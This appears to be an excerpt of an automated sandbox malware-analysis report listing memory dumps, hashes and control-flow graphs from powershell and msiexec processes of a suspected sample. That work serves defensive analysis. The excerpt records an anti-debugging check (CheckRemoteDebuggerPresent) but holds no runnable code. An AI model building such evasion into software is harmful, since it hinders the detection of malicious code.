                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: afb3c202cd2eb6bb376b2d9e33f4f08702dbee7efb4f67e57e2f8372bf8a9b71
                                                                                              • Instruction ID: e37323cbc7976d95b8ac88a0cc475039597efb0a41230a15e16e9a3f9391e2b4
                                                                                              • Opcode Fuzzy Hash: afb3c202cd2eb6bb376b2d9e33f4f08702dbee7efb4f67e57e2f8372bf8a9b71
                                                                                              • Instruction Fuzzy Hash: DD01753D3152504FC74AA734642456D7FA3EFC6521315414AE402C7796CF24CC0787A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 953f6d49abc85d583154ab30ec302cf282deb5a3803ed23942bff7ae72ddfab7
                                                                                              • Instruction ID: 7682ca5449a4d13e4f18e858fc2b9c6cdd6212840ea74e7fe81241c0b2ef7545
                                                                                              • Opcode Fuzzy Hash: 953f6d49abc85d583154ab30ec302cf282deb5a3803ed23942bff7ae72ddfab7
                                                                                              • Instruction Fuzzy Hash: E20126353453802FD319E275BC50BEE7B63BBC5524F10466DE4029F2E6CAA09C0943A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a9a1878c9864f78abe9ac7ec98310a4f9ffc46c0d4b227b3c08b3bc8de404e06
                                                                                              • Instruction ID: 923356097ef976faa9a59d30d3ce2ad1a2a0204bca440ea3339b9afd88d138e1
                                                                                              • Opcode Fuzzy Hash: a9a1878c9864f78abe9ac7ec98310a4f9ffc46c0d4b227b3c08b3bc8de404e06
                                                                                              • Instruction Fuzzy Hash: 9811A974F0020A9FDB14DBA8E4456EEBFB2FB85304F1081A9D94A97291DA764942CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a3fa217cdbc447604512daa21b6cbed55bb156465e9dbaaef053e65da352005
                                                                                              • Instruction ID: 7ce55b591f3e0cbabee911bda88e53ecfc8eaa51be9580092dbcd73a471bcd71
                                                                                              • Opcode Fuzzy Hash: 6a3fa217cdbc447604512daa21b6cbed55bb156465e9dbaaef053e65da352005
                                                                                              • Instruction Fuzzy Hash: D2F02B353403502BD21CE665FC50B5F7767FBC4A14F50893CE9055F395CEA1AC054395
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7ed8a58f0bfa1f9592c1b1a27777482c30f8525760fd1309907f447ab5cc2746
                                                                                              • Instruction ID: abe44c534bd89828813201fd59f62b4046820931dfbbbbb2666cd33d3ff7394a
                                                                                              • Opcode Fuzzy Hash: 7ed8a58f0bfa1f9592c1b1a27777482c30f8525760fd1309907f447ab5cc2746
                                                                                              • Instruction Fuzzy Hash: F4F0E9323092454FC72242A978582EE7FA6FBCA510315422ED44ACB656CB554C0743A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9d58fe160fd16b0f7ae02d4935a40a88767851499bf89b9eff28c13b0dfe1db
                                                                                              • Instruction ID: 6781864acfc693be820cc9c3490ba82b43b0d222d45349e61b519d13c3fb7715
                                                                                              • Opcode Fuzzy Hash: b9d58fe160fd16b0f7ae02d4935a40a88767851499bf89b9eff28c13b0dfe1db
                                                                                              • Instruction Fuzzy Hash: 9AF0F6363007028FCB2456A9F41876E77E7FBC9511B00863DD44BCB254DF755C0643A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cff2e5c55d340a9714c7e6951ba2e7af3c20adf7c33efc6c4a0b190c70fb3740
                                                                                              • Instruction ID: 88baec4633b9ef5d4cd4d28f6c707048927761415b0c78a0012d3c44a388121d
                                                                                              • Opcode Fuzzy Hash: cff2e5c55d340a9714c7e6951ba2e7af3c20adf7c33efc6c4a0b190c70fb3740
                                                                                              • Instruction Fuzzy Hash: 80011D35A01115DFDB05CB98D890EBEF372FF89314B6481A8E915A7260C736EC52CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 95fe15cea5a66ba2ad8e43ee8ba6021dbdd2096ec673ba44356a9a87b21cb1ed
                                                                                              • Instruction ID: c1cad971fa1ede5e0f30ed37e0cd67beea0555bcf066196aa63ce5a3aa715532
                                                                                              • Opcode Fuzzy Hash: 95fe15cea5a66ba2ad8e43ee8ba6021dbdd2096ec673ba44356a9a87b21cb1ed
                                                                                              • Instruction Fuzzy Hash: D1F0303D3106108F87497B68A05893DBBE7EBC9622354821EE907C7759DF78DC038BA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4adc29445fc6ff8e3fddb58f2bfe9a358536c825879bba0c8971bc34f5004588
                                                                                              • Instruction ID: 09933b0239fe3952737a46dca24dd94c4d21e55ab838dcfd829a0a97050f2dbf
                                                                                              • Opcode Fuzzy Hash: 4adc29445fc6ff8e3fddb58f2bfe9a358536c825879bba0c8971bc34f5004588
                                                                                              • Instruction Fuzzy Hash: 88F0592670C3814FD71157B5781826C7FA2FBCA111308455EC487CB1A5CA54860283A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aed191eb159a89092f27f5a23451aed8e344232bf03344b58b8a3cbda9bf200d
                                                                                              • Instruction ID: 06c73faa5ac351efe66125ff22cc598bc9d238b13b0f4a643dfc1306da60602f
                                                                                              • Opcode Fuzzy Hash: aed191eb159a89092f27f5a23451aed8e344232bf03344b58b8a3cbda9bf200d
                                                                                              • Instruction Fuzzy Hash: 09E0DF39B042955FCF096778A45C6EEBBA6FBD8325F04012DE40A87B86CFB84912C785
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9df8f3d1c9d1541b23aa942ce0d3a57d73a5459b26040b8761e80c184d6ac797
                                                                                              • Instruction ID: 36445d5697a5e2f45dcf2b36b070a59d4b9513da61226c983b77231b030ac7ef
                                                                                              • Opcode Fuzzy Hash: 9df8f3d1c9d1541b23aa942ce0d3a57d73a5459b26040b8761e80c184d6ac797
                                                                                              • Instruction Fuzzy Hash: 7FE026357042555BCF096778A45C2DEBA6AFBD8725F00002DE40A87B85CF785912C3D5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1befa9feaffae2d7c0dd66bd2d35661cfb95e598ee1297c7ada5d58e0bd9a25d
                                                                                              • Instruction ID: bbeab0ddbff5e9e32525aff72c37fa83b7452c68f5ba11b6997d13af0a4857cc
                                                                                              • Opcode Fuzzy Hash: 1befa9feaffae2d7c0dd66bd2d35661cfb95e598ee1297c7ada5d58e0bd9a25d
                                                                                              • Instruction Fuzzy Hash: CCE0923080508D8FCB05EBA4E5694FCBF70FA11214B50019DD50356556DA600167CF81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 275cd41324e2398beb180b15ec4fbe0897e9ca8a50161e4b16407b223b3b1284
                                                                                              • Instruction ID: 412e4027c47b282e7316cf4e7a27399602a5b2130ee8dd7c270248b558a082e9
                                                                                              • Opcode Fuzzy Hash: 275cd41324e2398beb180b15ec4fbe0897e9ca8a50161e4b16407b223b3b1284
                                                                                              • Instruction Fuzzy Hash: 97E01AB4D0010A9E8B80DFA888415EDFFF1EB48250B5085AAD848E7712E63286128F91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                              • Instruction ID: ed66c85621d214d82c89975aeeebcabf1622796635b310d99d479a351933eaf2
                                                                                              • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                              • Instruction Fuzzy Hash: B8D06270D042099F8780DFADD94156DFBF5EB48240F5085AA8919D7301F7315612CBD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 398881e76e5f4f543d45c0d9e59813faea9ad6d6ac87630a7b9a35979f632283
                                                                                              • Instruction ID: e7712b06999087be9309fc6dbc65cd0af894c40c7bcd80a8f3c095642df75374
                                                                                              • Opcode Fuzzy Hash: 398881e76e5f4f543d45c0d9e59813faea9ad6d6ac87630a7b9a35979f632283
                                                                                              • Instruction Fuzzy Hash: 52D06735C0410E9BCB08FFA5E86A4BDBB74FB14201F90416DD90752996AA201967CFD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1638612548.0000000005010000.00000040.00000800.00020000.00000000.sdmp, Offset: 05010000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_5010000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 82a8c7a0214b3070487d80d9421a0e3a452f33998fa2db844ca9754589377002
                                                                                              • Instruction ID: 262ce8701fd3ad93fdcd06958553a7345a5bf347eed46a33a87f5a4b6e34c75a
                                                                                              • Opcode Fuzzy Hash: 82a8c7a0214b3070487d80d9421a0e3a452f33998fa2db844ca9754589377002
                                                                                              • Instruction Fuzzy Hash: BDD05E30E041098FC744EFA4E59A87EBBB5EB48205F00416CDE0993794EB305852CFD1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 84l$84l$84l$84l
                                                                                              • API String ID: 0-3024328185
                                                                                              • Opcode ID: a0c99719f4eaa14eaca89a605be5c5c8b7c73b5818e2836b452b4f9f96409256
                                                                                              • Instruction ID: f37f1983f6defbf30a7ccf3f861ed2345a22fa66c539b736167f3a81b9bc1a23
                                                                                              • Opcode Fuzzy Hash: a0c99719f4eaa14eaca89a605be5c5c8b7c73b5818e2836b452b4f9f96409256
                                                                                              • Instruction Fuzzy Hash: E602D2B170020ADFDB389F65C4947AAB7B2AB89711F248469ED059B3D1CB31DD81CBE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1644746898.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_7c00000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (fl$(fl$(fl$(fl
                                                                                              • API String ID: 0-2123353879
                                                                                              • Opcode ID: e64588bf9a2d1fe33b9d88ef5d6b86faeb82e5f4c8583978f073c92a3c55c6a9
                                                                                              • Instruction ID: 665419a03d0b479bcc50cfa8299cda0f6f83d16b1a5d8d9013d15f07e7640b46
                                                                                              • Opcode Fuzzy Hash: e64588bf9a2d1fe33b9d88ef5d6b86faeb82e5f4c8583978f073c92a3c55c6a9
                                                                                              • Instruction Fuzzy Hash: DF717DB0A00245DBD718CF98C491AABBBF2AF8A314F24C169D9059F395CB71EE41CBD1

                                                                                              Execution Graph

                                                                                              Execution Coverage:7.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:100%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 23569 c77ec0 23570 c77f04 CheckRemoteDebuggerPresent 23569->23570 23571 c77f46 23570->23571

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 280566a0-280566c1 1 280566c3-280566c6 0->1 2 28056e67-28056e6a 1->2 3 280566cc-280566eb 1->3 4 28056e90-28056e92 2->4 5 28056e6c-28056e8b 2->5 12 28056704-2805670e 3->12 13 280566ed-280566f0 3->13 7 28056e94 4->7 8 28056e99-28056e9c 4->8 5->4 7->8 8->1 10 28056ea2-28056eab 8->10 18 28056714-28056723 12->18 13->12 15 280566f2-28056702 13->15 15->18 126 28056725 call 28056ec0 18->126 127 28056725 call 28056ebb 18->127 19 2805672a-2805672f 20 28056731-28056737 19->20 21 2805673c-28056a19 19->21 20->10 42 28056a1f-28056ace 21->42 43 28056e59-28056e66 21->43 52 28056af7 42->52 53 28056ad0-28056af5 42->53 55 28056b00-28056b13 52->55 53->55 57 28056e40-28056e4c 55->57 58 28056b19-28056b3b 55->58 57->42 59 28056e52 57->59 58->57 61 28056b41-28056b4b 58->61 59->43 61->57 62 28056b51-28056b5c 61->62 62->57 63 28056b62-28056c38 62->63 75 28056c46-28056c76 63->75 76 28056c3a-28056c3c 63->76 80 28056c84-28056c90 75->80 81 28056c78-28056c7a 75->81 76->75 82 28056cf0-28056cf4 80->82 83 28056c92-28056c96 80->83 81->80 84 28056e31-28056e3a 82->84 85 28056cfa-28056d36 82->85 83->82 86 28056c98-28056cc2 83->86 84->57 84->63 97 28056d44-28056d52 85->97 98 28056d38-28056d3a 85->98 93 28056cc4-28056cc6 86->93 94 28056cd0-28056ced 86->94 93->94 94->82 100 28056d54-28056d5f 97->100 101 28056d69-28056d74 97->101 98->97 100->101 104 28056d61 100->104 105 28056d76-28056d7c 101->105 106 28056d8c-28056d9d 101->106 104->101 107 28056d80-28056d82 105->107 108 28056d7e 105->108 110 28056db5-28056dc1 106->110 111 28056d9f-28056da5 106->111 107->106 108->106 115 28056dc3-28056dc9 110->115 116 28056dd9-28056e2a 110->116 112 28056da7 111->112 113 28056da9-28056dab 111->113 112->110 113->110 117 28056dcd-28056dcf 115->117 118 28056dcb 115->118 116->84 117->116 118->116 126->19 127->19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,4'$p4'
                                                                                              • API String ID: 0-658992411
                                                                                              • Opcode ID: 237592ed7396fad84b1d770b24dce39347da40f6e157de980299c83476e5db83
                                                                                              • Instruction ID: cfca525368d709c87caa9c77f9c86b0aab1c1e614f47e7a567313df0028f9cb6
                                                                                              • Opcode Fuzzy Hash: 237592ed7396fad84b1d770b24dce39347da40f6e157de980299c83476e5db83
                                                                                              • Instruction Fuzzy Hash: D7324030E11719CFDB14EBB4C89059DB7B2BFC9300F60C66AD519AB215EF34AA81CB90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,4'
                                                                                              • API String ID: 0-4255072755
                                                                                              • Opcode ID: 60b8636f99f2c393e5f5628662dc11fc83fd83ec6435f9366914dc9f9a966b31
                                                                                              • Instruction ID: 4662ecf5264b7954c843c412666a0dc8a08f134b42fa3909d6f3eaf46f5fe11c
                                                                                              • Opcode Fuzzy Hash: 60b8636f99f2c393e5f5628662dc11fc83fd83ec6435f9366914dc9f9a966b31
                                                                                              • Instruction Fuzzy Hash: A3923834A02204CFDB14DBA8C594B5DBBF3FB49314F5485A9D41AAB362DB39ED81CB90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 576 280587d8-280587f5 577 280587f7-280587fa 576->577 578 28058832-28058835 577->578 579 280587fc-28058802 577->579 580 28058837-2805884c 578->580 581 28058851-28058854 578->581 582 280589b0-280589db 579->582 583 28058808-28058810 579->583 580->581 584 28058856-28058869 581->584 585 2805886e-28058871 581->585 608 280589e5-280589e8 582->608 583->582 586 28058816-28058823 583->586 584->585 588 28058877-2805887a 585->588 589 2805897f-28058985 585->589 586->582 591 28058825-2805882d 586->591 594 2805887c-28058882 588->594 595 28058889-2805888c 588->595 589->584 592 2805898b 589->592 591->578 596 28058990-28058992 592->596 597 28058884 594->597 598 280588a7-280588aa 594->598 600 280588a2-280588a5 595->600 601 2805888e-2805889d 595->601 603 28058994 596->603 604 28058999-2805899c 596->604 597->595 602 280588af-280588b2 598->602 600->598 600->602 601->600 605 280588b4-280588d1 602->605 606 280588d6-280588d9 602->606 603->604 604->577 607 280589a2-280589af 604->607 605->606 610 280588e7-280588ea 606->610 611 280588db-280588e2 606->611 612 28058a00-28058a03 608->612 613 280589ea-280589fb 608->613 617 280588ec-280588ef 610->617 618 28058908-2805890e 610->618 611->610 614 28058a25-28058a28 612->614 615 28058a05-28058a09 612->615 613->612 623 28058a4a-28058a4d 614->623 624 28058a2a-28058a2e 614->624 621 28058ad2-28058b0b 615->621 622 28058a0f-28058a17 615->622 625 280588f1-280588fe 617->625 626 28058903-28058906 617->626 618->579 620 28058914 618->620 627 28058919-2805891c 620->627 642 28058b0d-28058b10 621->642 622->621 628 28058a1d-28058a20 622->628 631 28058a57-28058a5a 623->631 632 28058a4f-28058a56 623->632 624->621 630 28058a34-28058a3c 624->630 625->626 626->618 626->627 634 28058924-28058927 627->634 635 2805891e-2805891f 627->635 628->614 630->621 636 28058a42-28058a45 630->636 637 28058a5c-28058a63 631->637 638 28058a6a-28058a6d 631->638 643 28058933-28058936 634->643 644 28058929-28058932 634->644 635->634 636->623 645 28058a65 637->645 646 28058aca-28058ad1 637->646 640 28058a87-28058a8a 638->640 641 28058a6f-28058a73 638->641 650 28058a8c-28058a96 640->650 651 28058a9b-28058a9e 640->651 641->621 647 28058a75-28058a7d 641->647 648 28058b12-28058b17 642->648 649 28058b1a-28058b1d 642->649 652 28058943-28058946 643->652 653 28058938-2805893c 643->653 645->638 647->621 654 28058a7f-28058a82 647->654 648->649 655 28058b35-28058b38 649->655 656 28058b1f-28058b32 649->656 650->651 657 28058aa0-28058aa4 651->657 658 28058ab8-28058aba 651->658 660 28058950-28058953 652->660 661 28058948-2805894b 652->661 653->607 659 2805893e 653->659 654->640 663 28058b57-28058b5a 655->663 664 28058b3a-28058b4c 655->664 657->621 665 28058aa6-28058aae 657->665 666 28058ac1-28058ac4 658->666 667 28058abc 658->667 659->652 668 28058955-28058957 660->668 669 2805895a-2805895d 660->669 661->660 672 28058b61-28058b64 663->672 673 28058b5c-28058b5e 663->673 681 28058b52 664->681 682 28058e6e-28058e80 664->682 665->621 671 28058ab0-28058ab3 665->671 666->608 666->646 667->666 668->669 674 2805895f-28058975 669->674 675 2805897a-2805897d 669->675 671->658 676 28058b66-28058b69 672->676 677 28058b6f-28058cdb 672->677 673->672 674->675 675->589 675->596 676->677 680 28058e29-28058e2c 676->680 726 28058ce1-28058ce8 677->726 727 28058e13-28058e26 677->727 684 28058e2e-28058e40 680->684 685 28058e4b-28058e4e 680->685 681->663 691 28058eb3-28058eb8 682->691 692 28058e82 682->692 684->656 694 28058e46 684->694 686 28058e50-28058e62 685->686 687 28058e69-28058e6c 685->687 686->691 700 28058e64 686->700 687->682 690 28058e87-28058e8a 687->690 690->677 697 28058e90-28058e93 690->697 695 28058ebb-28058ebd 691->695 692->690 694->685 698 28058ec4-28058ec7 695->698 699 28058ebf 695->699 702 28058e95-28058ea7 697->702 703 28058eae-28058eb1 697->703 698->642 704 28058ecd-28058ed6 698->704 699->698 700->687 702->691 707 28058ea9 702->707 703->691 703->695 707->703 728 28058cee-28058d11 726->728 729 28058d9b-28058da2 726->729 738 28058d19-28058d20 728->738 729->727 731 28058da4-28058dd7 729->731 742 28058ddc-28058e09 731->742 743 28058dd9 731->743 740 28058d25-28058d66 738->740 741 28058d22 738->741 751 28058d7e-28058d8f 740->751 752 28058d68-28058d79 740->752 741->740 742->704 742->727 743->742 751->704 752->704
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (
                                                                                              • API String ID: 0-3887548279
                                                                                              • Opcode ID: ecc4cec8f013637ff15180bfa584320189100ab4a214adeb3638387ea5c57912
                                                                                              • Instruction ID: 9b6f584a7b89c7eb86a62a282af02f07d277ee3f813a14ad68454dad045d7b1c
                                                                                              • Opcode Fuzzy Hash: ecc4cec8f013637ff15180bfa584320189100ab4a214adeb3638387ea5c57912
                                                                                              • Instruction Fuzzy Hash: E112BF31F01215DBEB14DA64C88069FB7E7FB89310F248439ED459B382DA39EE41CBA5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 762 c77ec0-c77f44 CheckRemoteDebuggerPresent 764 c77f46-c77f4c 762->764 765 c77f4d-c77f88 762->765 764->765
                                                                                              APIs
                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00C77F37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2656501703.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_c70000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                              • String ID:
                                                                                              • API String ID: 3662101638-0
                                                                                              • Opcode ID: 9c0e559d29bb34b5c9b94e13fa9b938daaadf6db4078fce96910cad5823ad313
                                                                                              • Instruction ID: 931db326ac8414ef7ff01104f23dd672ece09a107a9dfa0985a3560fa7018f94
                                                                                              • Opcode Fuzzy Hash: 9c0e559d29bb34b5c9b94e13fa9b938daaadf6db4078fce96910cad5823ad313
                                                                                              • Instruction Fuzzy Hash: B7213AB180125ACFDB10CFAAD484BEEFBF4AF49320F14845AE459A3350D778A945CF61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2680626151.0000000028050000.00000040.00000800.00020000.00000000.sdmp, Offset: 28050000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_28050000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fb7a53c9ef5780f3bccacac7d6a419bb9996ff382ad918e86531a431f78b160a
                                                                                              • Instruction ID: bbb2dc7519222432a30c70bc0392ff6a273b845dceb74f19d0f6467c086b4a40
                                                                                              • Opcode Fuzzy Hash: fb7a53c9ef5780f3bccacac7d6a419bb9996ff382ad918e86531a431f78b160a
                                                                                              • Instruction Fuzzy Hash: 1E223F34A02249CBEB14CB68C4D479EBBF7FB89310F648525E485DB392DB39ED418B61

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 755 c77eb8-c77f44 CheckRemoteDebuggerPresent 758 c77f46-c77f4c 755->758 759 c77f4d-c77f88 755->759 758->759
                                                                                              APIs
                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00C77F37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2656501703.0000000000C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_c70000_msiexec.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                              • String ID:
                                                                                              • API String ID: 3662101638-0
                                                                                              • Opcode ID: dde4d6da1294fd1f0f52a825200f15ff945ed3c592130613cafd5d3b8e85e6a6
                                                                                              • Instruction ID: 3832b92300f3a5e5147e6d1a216dd14eb1f08e55f657143c0a3e3f7266eea3ce
                                                                                              • Opcode Fuzzy Hash: dde4d6da1294fd1f0f52a825200f15ff945ed3c592130613cafd5d3b8e85e6a6
                                                                                              • Instruction Fuzzy Hash: B22139B180125A9FCB10CFAAD484BEEFBF4AF49320F14845AE458A3741C778A945CFA1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
